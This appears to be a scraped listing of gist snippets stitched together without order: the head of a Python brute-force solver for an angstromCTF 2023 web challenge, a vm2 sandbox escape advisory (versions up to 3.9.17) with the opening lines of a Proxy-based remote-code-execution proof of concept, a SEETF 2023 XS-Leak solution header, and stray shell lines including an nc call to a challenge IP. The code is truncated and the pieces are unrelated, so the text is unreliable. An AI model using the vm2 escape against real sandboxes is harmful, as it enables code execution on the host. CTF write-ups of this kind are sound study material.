| # ångstromCTF 2023 - web/filestore | |
| # Solution: just bruteforce for uniqid() | |
| import httpx | |
| import subprocess | |
| from concurrent.futures import ThreadPoolExecutor | |
| # BASE_URL = "http://localhost:3000" | |
| BASE_URL = "https://filestore.web.actf.co" |
A sandbox escape vulnerability exists in vm2 for versions up to 3.9.17. It abuses an unexpected creation of a host object based on the specification of Proxy, and allows RCE via Function in the host context.
A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.
| const { VM } = require("vm2"); | |
| const vm = new VM(); | |
| const code = ` | |
| let proxiedInspect; | |
| const source = new Proxy(() => {}, { | |
| get: function (target, prop, receiver) { | |
| if (prop === Symbol.for("nodejs.util.inspect.custom")) { | |
| // https://github.com/nodejs/node/blob/v20.1.0/lib/internal/util/inspect.js#L805-L811 |
| /* | |
| SEETF 2023 - Web/Mandatory Notes Challenge - 4 solves / 496 points | |
| * ctftime: https://ctftime.org/event/1828 | |
| Solution: XS-Leak with URL length limits in Google Chrome. I used a very long authority part to make the oracle. | |
| */ |
I predict that this URL will be broken because the directory structure will change when the final round source code is released, as in previous years 😅 ↩
$ python exploit.py
Who will do this?
My solution:
$ nc 34.84.217.62 30002<body>